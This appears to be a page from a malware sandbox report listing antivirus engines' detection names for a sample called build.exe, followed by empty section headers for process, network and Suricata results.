VirIT	Trojan.Win32.Tepfer.AE
Symantec	ML.Attribute.HighConfidence
tehtris	Generic.Malware
ESET-NOD32	a variant of Win32/Kryptik.HXJD
APEX	Malicious
Avast	Win32:DropperX-gen [Drp]
ClamAV	Win.Packed.Fareit-10030127-0
Kaspersky	HEUR:Trojan.Win32.Strab.gen
Rising	Trojan.Yakes!8.430 (CLOUD)
F-Secure	Trojan.TR/AD.InstaBot.rajyu
DrWeb	Trojan.Pitou.18
TrendMicro	Trojan.Win32.SMOKELOADER.YXEFYZ
McAfeeD	Real Protect-LS!71B44C9A55F3
Trapmine	malicious.high.ml.score
FireEye	Generic.mg.71b44c9a55f3b406
Sophos	Mal/Generic-S
Ikarus	Trojan.Win32.Stealc
Webroot	W32.Trojan.Gen
Google	Detected
Avira	TR/AD.InstaBot.rajyu
Kingsoft	malware.kb.a.1000
Gridinsoft	Ransom.Win32.STOP.tr
Microsoft	Trojan:Win32/Yakes.SPON!MTB
ViRobot	Trojan.Win.Z.Kryptik.859648.E
ZoneAlarm	HEUR:Trojan.Win32.Strab.gen
GData	Win32.Trojan-Ransom.STOP.LWKOWZ
Varist	W32/Kryptik.MIR.gen!Eldorado
AhnLab-V3	Trojan/Win.Generic.R653711
BitDefenderTheta	Gen:NN.ZexaF.36808.0q0@ae@LVKaG
DeepInstinct	MALICIOUS
VBA32	BScope.Malware-Cryptor.Win32.313
Malwarebytes	Trojan.MalPack.GS
TrendMicro-HouseCall	Trojan.Win32.SMOKELOADER.YXEFYZ
SentinelOne	Static AI - Suspicious PE
MaxSecure	Win.MxResIcn.Heur.Gen
Fortinet	W32/Kryptik.HBBY!tr
AVG	Win32:DropperX-gen [Drp]
Paloalto	generic.ml
CrowdStrike	win/malicious_confidence_100% (W)

build.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All